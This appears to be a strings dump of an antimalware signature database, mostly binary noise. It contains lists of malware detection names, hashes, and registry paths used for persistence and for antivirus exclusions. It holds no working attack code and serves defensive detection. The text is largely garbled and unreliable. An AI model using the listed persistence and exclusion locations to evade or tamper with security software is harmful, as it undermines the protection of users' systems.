/0>]/uva/lub/|cd/bid/70e/ade/yee/ome/zdh/jai/8fi/cgi/lti/nek/.cl/eam/adm/_en/ion/hup/var/65s/ers/_us/.at/net/icu/*ev/.pw/vax/(){/d){/se{/14}/;}}/d(!0==!0\",\"0;'0\",(0),(0)-(0!=(0if(0at(0(/*005+018+0\"),0(0,001,0b7,0=(-0x)-0-3-045-016-0h=-002.0.4.015.0%6/0�p-000.0010002000300060008000900001001100720073005400\"5000600(800,800._001e008e007f00(\"10r(103-100010101060100110,21002103210041015100810\":105:10][10__10sa10ot10(\"20902003200520;8200920sa20db20 Wv67 AC@ kz o5H x*a # T} \\ KT zc# KT z] @ @ ,v5 g F `~> jL< p yH; yH; Y S7> 2 > Dd` ?G9> ?G9> P {6[? l~b? \th` ? y(n? S? $& m? 7 <)}? <)}? X]^ 8b^? 8b^? n =/? m CEc? CEc? k +vo? OA~? \"4-? s? SX ? []S > uvB :I)` qI\" W-6 #/ C F$ !@ `QJN @ `p@ )$+T j 5! a \t1 C EA( # C > > B\tBE B\tBE _/<3p R@Q5A H3gSs HeGV-[ Q+kP^ H}2DO ZFNfW nM~8p 9x7)] XnKC8 9ui#} 2ke/! D(HyS} @bjHD GIHV Z!5||~* 3GcF> Is}Dlk5 meVance !#Exploit:Win32/Dufmoh.C U{S(& !#SCPT:Nemucod_exclusion\\6n !#SCPT:Nemucod_exclusiond oP}W(& !#SCPT:PWS:HTML/Phish.X1 !#SCPT:PWS:HTML/Phish.X2 !#SCPT:PWS:HTML/Phish.X3 !#SCPT:PWS:HTML/Phish.X4 !#SCPT:Trojan:BAT/Zbot.A\t !#SCRIPT:CozerRelatedPdfX !#SLF:SCPT/Clengtst.E!cl6 !#SP:VirTool:JS/Flashy.A !#Trojan:VBS/Schopets.P1 !#Trojan:VBS/Schopets.P2:2n #VirTool:JS/Obfuscator.H !#ALFPER:Adwind.GetAV!vbs !#SCPT:RTF/CVE20170199REV !#SCPT:RTF/CVE20170199STR !#SCRIPT:ServuFtpMainPage !#SLF:Trojan:O97M/Nocgreyh !#TEL:HTML/CoinHive.C!lib% !#TEL:HTML/CoinHive.C!lib0 !#TEL:HTML/CoinHive.C!libPH !#TEL:HTML/CoinHive.C!libc/ !#TEL:HTML/CoinHive.C!libdH=T !#TEL:HTML/CoinHive.C!libt !#TEL:HTML/CoinHive.C!lib !#TEL:Ransom:TXT/Cerber.A- !#TEL:Ransom:TXT/Cerber.A !#TEL:Ransom:VBS/Cerber.AU| #Trojan:Win32/Jpgiframe.A5 #Trojan:Win32/Jpgiframe.A !#ALF:Java/BanloadManifest !#ALFPER:MSIL/Samas.A!html !#Backdoor:ASP/Dirtelti.P1 !#Backdoor:ASP/Dirtelti.P2K] !#MpIsExhaustiveScriptScan eQ) !#MpIsExhaustiveScriptScanu !#SCPT:Adodb.base64encoded !#SCPT:PDF/Frauddoc.RJ!MTB$ !#SCPT:Ransom:HTML/Locky.B !#SCPT:Trojan:JS/Obfuse.G1 !#Trojan:HTML/FakeAlert.P1 !#Trojan:HTML/FakeAlert.P2 !#Trojan:VBS/Startpage.N.1x !#Trojan:VBS/Startpage.W.1 #Exploit:Win32/ShellCode.A' #Exploit:Win32/ShellCode.A !#ALF:Extention:JS/FakeAV.B !#PossibleJenxcusObfuscator] Y6%0() !#PossibleJenxcusObfuscator !#SCPT:VBS/Exception_Tisifi !#SCRIPT:Jenxcus_Obfuscator !#TEL:HTML/ObfusAnalytics.Ab !#TEL:HTML/ObfusAnalytics.B !#TEL:Trojan:JS/Chromex!MSR !#Trojan:Win32/Vilsel.C!delZ$ !#ALF:PowerShell.Mikatz.S001 !#ALF:PowerShell.Mikatz.S002m !#Exploit:HTML/CVE-2010-3329b# !#RTF_DEEPSCAN!CVE-2010-3333p !#RTF_DEEPSCAN!CVE-2010-3333 !#SCPT:PWS:O97M/Phish.G1!MSR !#SCPT:Ransom:JS/Vaultlock.A !#SCPT:VirTool:JS/Pdf_NoSaveo`l !#TEL:Exploit:JS/ObjSnap!MTBt !#Trojan:PowerShell/Tnega.P1n !#Trojan:PowerShell/Tnega.P2 !#Trojan:PowerShell/Tnega.PA !#Trojan:PowerShell/Tnega.PB !#ALF:Extention:JS/infatica.A !#ALF:Extention:JS/infatica.b !#ALF:Trojan:BAT/Killfiles.RAX !#PossibleJenxcusObfuscatorV2NP; !#SCPT:JenxcusCustomBase64Obf !#SCPT:Trojan:JS/MalScript.B1G !#SCPT:Trojan:JS/MalScript.B2{ !#SCPT:Trojan:JS/MalScript.B3 !#SCPT:Trojan:JS/MalScript.B4 !#SCPT:Trojan:JS/MalScript.B5 !#SCPT:Trojan:JS/MalScript.B6 !#SCPT:Trojan:JS/MalScript.B7 !#SCPT:Trojan:JS/MalScript.B8 !#SCPT:VirTool:JS/SeeNoEvil.A>(o 9[G(+ !#SCPT:VirTool:JS/SeeNoEvil.AG !#SCRIPT:Trojan:JS/Medfos.B.1 !#TEL:Ransom:HTML/CryptMess.A] !#TEL:Ransom:HTML/CryptMess.Agf !#TEL:Ransom:TXT/Cerber.B!rsm'*F !#TEL:Ransom:VBS/Cerber.B!rsm !#TEL:Trojan:HTML/Phish.D!MSR !#TEL:Trojan:JS/Nemucod.R!MTB !#TEL:Trojan:JS/Nemucod.R!MTB4(6 !#TEL:Trojan:JS/Nemucod.R!MTB] !#TEL:Trojan:JS/Nemucod.R!MTBhsrS !#Trojan:AndroidOS/Malcert.B1 !#Trojan:PowerShell/Tnega.P11l !#Trojan:PowerShell/Tnega.P12 !#VirTool:Win32/Obfuscator.XYY4K /3DR(+ !#VirTool:Win32/Obfuscator.XYqG !#VirTool:Win32/Obfuscator.XY !#ALF:BanloadJarLoaderManifest !#ALF:Trojan:HTML/Phish.NX!MTB: !#ALF:Trojan:JS/Obfuse.PRF!MTBb !#SCPT:Exploit:HTML/Fashack.AP !#SCPT:Exploit:HTML/Fashack.AQ !#SCPT:Exploit:HTML/Fashack.AR !#SCPT:Trojan:Win32/Lodbak!lnkG^ !#SCRIPT:PWS:Win32/Phishbank.A !#TEL:Trojan:VBS/Runcatnet!dha 2L_h(, !#TEL:Trojan:VBS/Ursnif.SS!MTB< #Nexgen_Acidmax_Rainbow_PlayerE !#ALF:SCPT:Win32/Coinminer.S001O !#ALF:SCPT:Win32/Coinminer.S001q# !#ALF:Trojan:BAT/Killav.SIB!MTB !#ALF:Trojan:PDF/Sonbokli.R!MTB !#ALF:Trojan:VBA/Downldr.RA!MTBk !#ALF:Trojan:VBA/Downldr.RB!MTBk !#ALF:Trojan:VBA/Downldr.RC!MTBk !#ALF:Trojan:VBA/Downldr.RD!MTBk !#ALF:Trojan:VBS/Obfuse.PRF!MTBs !#SCPT:Backdoor:Python/Covnoo.A8 !#SCPT:Trojan:O97M/Phish.G1!MSRh !#SCPT:Trojan:O97M/Phish.G2!MSRh !#SCPT:VirTool:JS/Obfuscator.BU !#SCRIPT:NotodarClickerScript.A !#SCRIPT:Trojan:Win32/Sercgov.A !#SCRIPT:Worm:VBS/Dunihi.B_footv !#SCRIPT:Worm:VBS/Dunihi.B_head !#TEL:Backdoor:ASP/WebShell!MSR !#TEL:Trojan:HTML/FakeAlert!MSRt !#TrojanClicker:JS/Faceliker.P1 !#TrojanClicker:JS/Faceliker.P2W^ !#ALF:Trojan:AndroidOS/Malcert.A (. !#ALF:Trojan:AndroidOS/Malcert.A !#ALF:Trojan:JS/TrickBot.PRF!MTB (. !#ALF:Trojan:JS/TrickBot.PRF!MTB !#Exception:CmdBatchWithSchtasksn<; (. !#Exception:CmdBatchWithSchtasksn<; !#Exception:CmdBatchWithSchtasks (. !#Exception:CmdBatchWithSchtasks !#SCPT:O97M/CVE-2012-0158.RA!MTB (. !#SCPT:O97M/CVE-2012-0158.RA!MTB !#SCPT:O97M/CVE-2012-0158.RA!MTB1 (. !#SCPT:O97M/CVE-2012-0158.RA!MTB1 !#SCPT:O97M/CVE-2012-0158.RA!MTB3 (. !#SCPT:O97M/CVE-2012-0158.RA!MTB3 !#SCPT:O97M/CVE-2012-0158.RA!MTBB (. !#SCPT:O97M/CVE-2012-0158.RA!MTBB !#SCPT:O97M/CVE-2012-0158.RA!MTBHWE (. !#SCPT:O97M/CVE-2012-0158.RA!MTBHWE !#SCPT:O97M/CVE-2012-0158.RA!MTBR (. !#SCPT:O97M/CVE-2012-0158.RA!MTBR !#SCPT:O97M/CVE-2012-0158.RA!MTBiGHj (. !#SCPT:O97M/CVE-2012-0158.RA!MTBiGHj !#SCPT:O97M/CVE-2012-0158.RA!MTBt4 (. !#SCPT:O97M/CVE-2012-0158.RA!MTBt4 !#SCRIPT:Worm:VBS/Jenxcus.L_head (. !#SCRIPT:Worm:VBS/Jenxcus.L_head !#SCRIPT:Worm:VBS/Jenxcus.L_tailF (. !#SCRIPT:Worm:VBS/Jenxcus.L_tailF !#TrojanDownloader:JS/Nemucod.A1 (. !#TrojanDownloader:JS/Nemucod.A1 !#TrojanDownloader:JS/Nemucod.A2 (. !#TrojanDownloader:JS/Nemucod.A2 !#TrojanDownloader:JS/Nemucod.B1 (. !#TrojanDownloader:JS/Nemucod.B1 !#TrojanDownloader:JS/Nemucod.B2 (. !#TrojanDownloader:JS/Nemucod.B2 !#TrojanDownloader:JS/Nemucod.C1 (. !#TrojanDownloader:JS/Nemucod.C1 !#TrojanDownloader:JS/Nemucod.C2 (. !#TrojanDownloader:JS/Nemucod.C2 !!#//EXC:Exploit:Win32/ShellCode.A (/!!#//EXC:Exploit:Win32/ShellCode.A !!#SCPT:Worm:VBS/Jenxcus!JunkSleep (/!!#SCPT:Worm:VBS/Jenxcus!JunkSleep !!#SCRIPT:Exploit:HTML/Axpergle.AG (/!!#SCRIPT:Exploit:HTML/Axpergle.AG !!#SCRIPT:Trojan:Win32/Sercgov.endW (/!!#SCRIPT:Trojan:Win32/Sercgov.endW !!#SCRIPT:Worm:Win32/Gamarue.W!lnk^ (/!!#SCRIPT:Worm:Win32/Gamarue.W!lnk^ !!#TEL:Trojan:HTML/Phishing.SM!MTB ;(/!!#TEL:Trojan:HTML/Phishing.SM!MTB !!#TEL:Trojan:HTML/Phishing.SM!MTBt (\to (/!!#TEL:Trojan:HTML/Phishing.SM!MTBt !!#TEL:Trojan:HTML/Phishing.SS!MTB (/!!#TEL:Trojan:HTML/Phishing.SS!MTB [ E{]K[ 1[ O[ {,f[ {,f[ [ [ *^l[ *^l[ [ [ [ {[ [ [ [ [ [ \"!#ALF:Trojan:Script/Sabsik.SIB!MTB (0\"!#ALF:Trojan:Script/Sabsik.SIB!MTB \"!#SCPT:Trojan:HTML/MalScript.H!MTB (0\"!#SCPT:Trojan:HTML/MalScript.H!MTB \"!#SCPT:Trojan:HTML/Phish.RVAA1!MTB (0\"!#SCPT:Trojan:HTML/Phish.RVAA1!MTB \"!#SCRIPT:Worm:Win32/Vercuser.A!lnk) (0\"!#SCRIPT:Worm:Win32/Vercuser.A!lnk) \"!#TEL:TrojanDownloader:VBS/Ruapt.A Q(0\"!#TEL:TrojanDownloader:VBS/Ruapt.A \"!#do_exhaustivehstr_rescan_jenxcus;., (0\"!#do_exhaustivehstr_rescan_jenxcus;., \"#TrojanDownloader:HTML/Adodb.gen!B (0\"#TrojanDownloader:HTML/Adodb.gen!B #!#ALF:Trojan:Script/Ranworwe.RS!MTB (1#!#ALF:Trojan:Script/Ranworwe.RS!MTB #!#ALF:TrojanDropper:JS/Revil.PA!MTBpf (1#!#ALF:TrojanDropper:JS/Revil.PA!MTBpf #!#BrowserModifier:WinREG/IEHomepage (1#!#BrowserModifier:WinREG/IEHomepage #!#LOWFI:Backdoor:VBS/Brozerch.A!dha R(1#!#LOWFI:Backdoor:VBS/Brozerch.A!dha #!#SCPT:HackTool:ASP/AspxShell!cmdsB^ (1#!#SCPT:HackTool:ASP/AspxShell!cmdsB^ #!#SCRIPT:Exploit:Win32/Pdfjsc.ADS.1 (1#!#SCRIPT:Exploit:Win32/Pdfjsc.ADS.1 #!#SCRIPT:Trojan:Win32/Jabonit.A_revH GtJ(1#!#SCRIPT:Trojan:Win32/Jabonit.A_revH #!#TEL:Exploit:O97M/CVE-2012-0158.DP (1#!#TEL:Exploit:O97M/CVE-2012-0158.DP $!#ALF:SCRIPT:Trojan:JS/Redirector.QE (2$!#ALF:SCRIPT:Trojan:JS/Redirector.QE $!#TEL:TrojanDownloader:JS/Tranamul.A[ (2$!#TEL:TrojanDownloader:JS/Tranamul.A[ $!#TrojanDownloader:O97M/Gamaredon.B1h (2$!#TrojanDownloader:O97M/Gamaredon.B1h $!#TrojanDownloader:O97M/Gamaredon.B2 (2$!#TrojanDownloader:O97M/Gamaredon.B2 %!#//SCPT:Trojan:AndroidOS/Fakeinst.SA (3%!#//SCPT:Trojan:AndroidOS/Fakeinst.SA %!#//SCPT:Trojan:AndroidOS/Fakeinst.SBM (3%!#//SCPT:Trojan:AndroidOS/Fakeinst.SBM %!#//SCPT:Trojan:AndroidOS/Fakeinst.SC!9 _(3%!#//SCPT:Trojan:AndroidOS/Fakeinst.SC!9 %!#//SCPT:Trojan:AndroidOS/Fakeinst.SD \\(3%!#//SCPT:Trojan:AndroidOS/Fakeinst.SD %!#//SCPT:Trojan:AndroidOS/Fakeinst.SE (3%!#//SCPT:Trojan:AndroidOS/Fakeinst.SE %!#ALF:TrojanDownloader:JS/Nemucod!MTB/ )(3%!#ALF:TrojanDownloader:JS/Nemucod!MTB/ %!#ALF:TrojanDropper:VBS/Obfus.ARA!MTB x\\ (3%!#ALF:TrojanDropper:VBS/Obfus.ARA!MTB %#FP_TrojanDownloader:HTML/Adodb.gen_A#* (3%#FP_TrojanDownloader:HTML/Adodb.gen_A#* %!#SCPT:Exploit:O97M/CVE-2017-8570.BD1 (3%!#SCPT:Exploit:O97M/CVE-2017-8570.BD1 %!#SCPT:Exploit:O97M/CVE-2017-8570.BD2 (3%!#SCPT:Exploit:O97M/CVE-2017-8570.BD2 %!#SCPT:Exploit:O97M/CVE-2017-8570.BD3 (3%!#SCPT:Exploit:O97M/CVE-2017-8570.BD3 %!#SCRIPT:TrojanDropper:Win32/Figyek.A] (3%!#SCRIPT:TrojanDropper:Win32/Figyek.A] %!#SCRIPT:VirTool:Win32/AutInject.BS.1+ MJ((3%!#SCRIPT:VirTool:Win32/AutInject.BS.1+ %!#SCRIPT:VirTool:Win32/AutInject.BS.1 (3%!#SCRIPT:VirTool:Win32/AutInject.BS.1 ;Ffn %!#SCRIPTLOWFI:Trojan:PHP/Redirector.H (3%!#SCRIPTLOWFI:Trojan:PHP/Redirector.H &!#ALF:Exploit:Win32/CVE-2017-11882!MTB (4&!#ALF:Exploit:Win32/CVE-2017-11882!MTB &!#ALF:SCRIPT:Trojan:Win32/Asruex.A!dha )(4&!#ALF:SCRIPT:Trojan:Win32/Asruex.A!dha (4&!#ALF:SCRIPT:Trojan:Win32/Asruex.A!dha &!#ALF:TrojanDownloader:VBS/Gozi.SS!MTB (4&!#ALF:TrojanDownloader:VBS/Gozi.SS!MTB &!#FP_TrojanDownloader:HTML/Adodb.gen_A (4&!#FP_TrojanDownloader:HTML/Adodb.gen_A &!#SCRIPT:TrojanDropper:Win32/Sarvdap.A (4&!#SCRIPT:TrojanDropper:Win32/Sarvdap.A &!#SCRIPT:VirTool:Win32/Injector.gen!EP (4&!#SCRIPT:VirTool:Win32/Injector.gen!EP &!#TEL:Powershell/ReflectivePEInjection (4&!#TEL:Powershell/ReflectivePEInjection '!#ALF:SCPT:Trojan:JS/Redirector.MRF!bitV (5'!#ALF:SCPT:Trojan:JS/Redirector.MRF!bitV '!#ALF:SCPT:Trojan:JS/Redirector.MRF!bit (5'!#ALF:SCPT:Trojan:JS/Redirector.MRF!bit '!#SCRIPT:TrojanDropper:VBS/Bladabindi.D (5'!#SCRIPT:TrojanDropper:VBS/Bladabindi.D '!#TEL:Exploit:O97M/CVE-2017-0199.JK!MTB (5'!#TEL:Exploit:O97M/CVE-2017-0199.JK!MTB '!#TEL:TrojanDownloader:VBS/Schopets!MSR (5'!#TEL:TrojanDownloader:VBS/Schopets!MSR (!#ALF:Exploit:O97M/CVE-2017-11882.AV!MTBk_] (6(!#ALF:Exploit:O97M/CVE-2017-11882.AV!MTBk_] (!#ALF:Exploit:O97M/CVE-2017-11882.JR!MTB (6(!#ALF:Exploit:O97M/CVE-2017-11882.JR!MTB (!#ALF:Exploit:O97M/CVE-2017-11882.SS!MTBy (6(!#ALF:Exploit:O97M/CVE-2017-11882.SS!MTBy (!#ALF:Exploit:O97M/CVE-2017-11882.SS!MTB (6(!#ALF:Exploit:O97M/CVE-2017-11882.SS!MTB (!#ALF:TrojanDownloader:VBS/Obfuse.AP!MTB (6(!#ALF:TrojanDownloader:VBS/Obfuse.AP!MTBJ@q (!#SCRIP:HackTool:Python/Smbexec!MSR.S001 (6(!#SCRIP:HackTool:Python/Smbexec!MSR.S001 (!#SCRIP:HackTool:Python/Smbexec!MSR.S002 (6(!#SCRIP:HackTool:Python/Smbexec!MSR.S002 (!#TEL:Exploit:O97M/CVE-2017-11882.JR!MTBh (6(!#TEL:Exploit:O97M/CVE-2017-11882.JR!MTBh (!#TEL:Exploit:O97M/CVE-2017-11882.JR!MTB (6(!#TEL:Exploit:O97M/CVE-2017-11882.JR!MTB (!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTB (6(!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTB (!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTB! (6(!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTB! (!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTB8 (6(!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTB8 (!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTBAt (6(!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTBAt (!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTBL (6(!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTBL (!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTBM (6(!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTBM (!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTBl (6(!#TEL:Exploit:O97M/CVE-2017-11882.RA!MTBl (!#TEL:TrojanDropper:PowerShell/Plugx!dha (6(!#TEL:TrojanDropper:PowerShell/Plugx!dha )!#ALF:TrojanDownloader:LNK/Agent.SIBA!MTB (7)!#ALF:TrojanDownloader:LNK/Agent.SIBA!MTB )!#ALF:TrojanDownloader:O97M/EncDoc.AS!MTBXTJ (7)!#ALF:TrojanDownloader:O97M/EncDoc.AS!MTBXTJ )!#ALF:TrojanDownloader:O97M/EncDoc.SA!MTBh (7)!#ALF:TrojanDownloader:O97M/EncDoc.SA!MTBh )!#ALF:TrojanDownloader:O97M/EncDoc.SM!MTB (7)!#ALF:TrojanDownloader:O97M/EncDoc.SM!MTB )!#ALF:TrojanDownloader:O97M/EncDoc.SM!MTB (7)!#ALF:TrojanDownloader:O97M/EncDoc.SM!MTB )!#ALF:TrojanDownloader:O97M/Obfuse.JM!MTBh (7)!#ALF:TrojanDownloader:O97M/Obfuse.JM!MTBh )!#ALF:TrojanDownloader:O97M/Powdow.AV!MTBu^ (7)!#ALF:TrojanDownloader:O97M/Powdow.AV!MTBu^ )!#ALF:TrojanDownloader:O97M/Qakbot.AS!MTBe (7)!#ALF:TrojanDownloader:O97M/Qakbot.AS!MTBe )!#SCPT:TrojanDownloader:BAT/Powdow.X1!MSR (7)!#SCPT:TrojanDownloader:BAT/Powdow.X1!MSR )!#SCRIPT:Backdoor:Win32/AluminumApt!lowfi (7)!#SCRIPT:Backdoor:Win32/AluminumApt!lowfi )!#SCRIPT:BrowserModifier:Win32/DefaultTab (7)!#SCRIPT:BrowserModifier:Win32/DefaultTab *!#ALF:TrojanDownloader:O97M/IcedID.PKX!MTBh (8*!#ALF:TrojanDownloader:O97M/IcedID.PKX!MTBh *!#TEL:TrojanDownloader:O97M/Emotet.STD!MTB (8*!#TEL:TrojanDownloader:O97M/Emotet.STD!MTB *!#TEL:TrojanDownloader:O97M/Emotet.WRD!MTBK (8*!#TEL:TrojanDownloader:O97M/Emotet.WRD!MTBK *!#TEL:TrojanDownloader:O97M/ObfBook.JK!MTBh (8*!#TEL:TrojanDownloader:O97M/ObfBook.JK!MTBh +!#//SCPT:TrojanDropper:AndroidOS/Gustuff.aa (9+!#//SCPT:TrojanDropper:AndroidOS/Gustuff.aa +!#ALF:HackTool:PowerShell/MysteryPart.A!MTBv0 (9+!#ALF:HackTool:PowerShell/MysteryPart.A!MTBv0 +!#ALF:SCRP:TrojanDownloader:JS/Nemucod.S0a0 (9+!#ALF:SCRP:TrojanDownloader:JS/Nemucod.S0a0 +!#ALF:Trojan:AndroidOS/FakeAdBlockerCert.A1Vfk (9+!#ALF:Trojan:AndroidOS/FakeAdBlockerCert.A1Vfk +!#ALF:Trojan:PowerShell/Meterpreter.SIB! (9+!#ALF:Trojan:PowerShell/Meterpreter.SIB! f97877392a32 fb7814d4bc30 fb78362a0fe6 fe780a9cff74 fe783ac7be81 10578f13cf283 109781cef300a 249782bccf2e8 !#Lua:MsilMpAttributeML!func !#Lua:MsilMpAttributeML!funcObMpAttributes 237887428d07 2e78d0a53169 3678ba8453c0 3d7891a17dbf 4a7820e2d697 517833c240a5 5a78e5e2a362 687849052314 8978411aa98c b778dc7357d4 b961ed6273cb d278e0c5b46b e4785b460595 fd782e507ee8 6978ea097b39 6978ea097b39Flags1 HSTR:Chaflicon 1027802cba9d1 10278788e17cc 103780a601f5c 103781259e139 1047856b61490 104788088a6f2 10578bb6daea7 106787e298866 10678f34d9baa 1087802e977ae 10878e6a36d45 10a78138db430 10b78be477e20 10b78e9794e95 10d784e45ce6b 10d78afdd93c0 10d78ea2bf57b 10f783cf7ae3e 10f78d239ccec 10f78f5d33371 11178201ea098 11178a8d40fbc 11378fe79ed85 114780d6e5801 11478d3cc79e7 1156181bf590a 1167800a1023f 1167827113d11 11678869381bf 117618bd584ca 11778286e731f 11878e3b8e18a 11878eea6ecf5 11b7824f7c497 11c780085cce5 11d78b00d18c8 11f7867f03502 11f787e0b2cad 1207866d3419c 120789634ba9e 12078db2543a7 121781cccb27d 123789c47137f 124613f1d038c 12540d2eff87e 125785ced0ef4 12578e76cd58d 1267823ee5e6e 126788db98d77 128788e87e83f C\\VdqC !~on#5P OA3JP I_K\"O `e:~~ +#km(# f%\\S{ f%\\S{ dL{cU f&dlV[I4 f&dlV[I4 8# ax _Kb#f9 ux3?SL [xX2L =<WwMo *}{{e= f/{( f2'}-t5\\ f2'}-t5\\ '3_R8 2~H@$&0 c1xA^b f8F^E, f8F^E, f:8V DlZtl <]%9$ X 8\\X f<\"< f=i\" !8<z i7*4[[ ,LBO3 fC<F fD0( 't:xV 5\\13}9E fEfJa fEfJa fG!v fI/js fI/js u\\Db^ fJ>w *7aTi fQqU fRd: fSBt gq,jt4|X B-@LF0b fV%L fW$N m+Coc @Vi vnTVa f]'w f_[[ /ghw+ n/\"Y (Kc4' fc6.A fc6.A fc`'?8& fc`'?8& fe=xz fe=xz feU0} feU0} &<b&*=S| fg$] fgT[ nzf ;dD] fjs#2 fmDy 7Bec' j!`oa Evkyh ,p r4 pcdX fwZ- fxvY fy#PB fy#PBVV fzHv> fzHv> jK$9| 7DtNH f~=D lnnHd N,9Y+> 9 gw^ ..GF{ .EF^p q14XH x0|=,1#4 )(L V 6,U46au*G*' y^rt\"- dI{{!- )82!7 _2>Sj B<-as DE<2. 4!rfb 5h68qC s|=ij xG`0|7JP 4Dn]x 0u$]> J>+Sh }o~e}_ feGrl vU!@pM Og\\w[ 8D\"yI oft\\Internet Explorer\\Approved Extensions HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Ext\\CLSID BHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Ext\\CLSID HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Ext\\PreApproved\\ @HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Ext\\PreApproved\\ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Ext\\PreApproved\\ @HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Ext\\PreApproved\\ HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\ApprovedExtensionsMigration\\ GHKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\ApprovedExtensionsMigration\\ HKCU\\Software\\Microsoft\\Internet Explorer\\ApprovedExtensionsMigration\\ GHKCU\\Software\\Microsoft\\Internet Explorer\\ApprovedExtensionsMigration\\ HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects OHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects [HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects OHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects HKCU\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects [HKCU\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\ PHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\ HKCU\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\ \\HKCU\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\ %SystemRoot%\\Tasks %SystemRoot%\\System32\\Tasks specialfolder://norecursive:taskscheduler: +specialfolder://norecursive:taskscheduler: specialfolder://recursive:taskscheduler: )specialfolder://recursive:taskscheduler: HKLM\\SOFTWARE\\Microsoft\\SchedulingAgent (HKLM\\SOFTWARE\\Microsoft\\SchedulingAgent TasksFolder HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders FHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders hkcuserkey OSMinorVersion \\System32\\drivers\\etc\\hosts # Copyright (c) 1993-2006 Microsoft Corp. *# Copyright (c) 1993-2006 Microsoft Corp. D# This is a sample HOSTS file used by Microsoft TCP/IP for Windows. F# This file contains the mappings of IP addresses to host names. Each D# entry should be kept on an individual line. The IP address should I# be placed in the first column followed by the corresponding host name. G# The IP address and the host name should be separated by at least one \t# space. G# Additionally, comments (such as these) may be inserted on individual ?# lines or following the machine name denoted by a '#' symbol. @# 102.54.94.97 rhino.acme.com # source server @# 38.25.63.10 x.acme.com # x client host # localhost name resolution is handle within DNS itself. 9# localhost name resolution is handle within DNS itself. # 127.0.0.1 localhost \"# 127.0.0.1 localhost # ::1 localhost \"# ::1 localhost # Copyright (c) 1993-1999 Microsoft Corp. *# Copyright (c) 1993-1999 Microsoft Corp. HKLM\\SOFTWARE\\Classes\\AppID\\ HKLM\\SOFTWARE\\Classes\\WOW6432Node\\AppID\\ )HKLM\\SOFTWARE\\Classes\\WOW6432Node\\AppID\\ AppId HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ \\HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ HKLM\\SOFTWARE\\Clients\\StartMenuInternet\\IEXPLORE.EXE\\shell\\open\\command HHKLM\\SOFTWARE\\Clients\\StartMenuInternet\\IEXPLORE.EXE\\shell\\open\\command \\Internet Explorer\\iexplore.exe HKLM\\SOFTWARE\\Wow6432Node\\Clients\\StartMenuInternet\\IEXPLORE.EXE\\shell\\open\\command THKLM\\SOFTWARE\\Wow6432Node\\Clients\\StartMenuInternet\\IEXPLORE.EXE\\shell\\open\\command HKLM\\SOFTWARE\\Policies\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths HHKLM\\SOFTWARE\\Policies\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0 1HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0 restrictsendingntlmtraffic HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\ KHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\ taskscheduler \\System32\\Tasks\\ HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender 2HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender SenseEnabled ManagedDefenderProductType PartnerGuid ^%s*(.-)%s*$ !#Lua:ContextFromQakbotDownload 3C$ @ pYov5V1 : ]ZDz IO/Z6 IO/Z6 5|6\"f yO!! % Zy 1 : IU\\i VLV.}!l M{6?#t IXE:K IXE:K IZUz I\\\t-[ I\\\t-[ I\\T_% I\\T_% I][tp I][tp >Md%ft IcjG Ie\\< G\\=/D u.5cF Ih`1$ Ih`1$ _U7Mj `'78j hAq+z IoIQ IrP0 2aQ$i*T IvCo Ix}#= Ix}#= q($+n Iy?_1 Iy?_1 IzxA HqpYy oVC+j I{<_ tSr8^ (`E+n z `Hu Y/{\t{ sdUUs R4'Y! Qy`J(r L _>u J\t,!T`#*y1 kBd?A JoSmc p<q-\t <T;,%o F-8$O nDG9!( (<|m= };J6'v 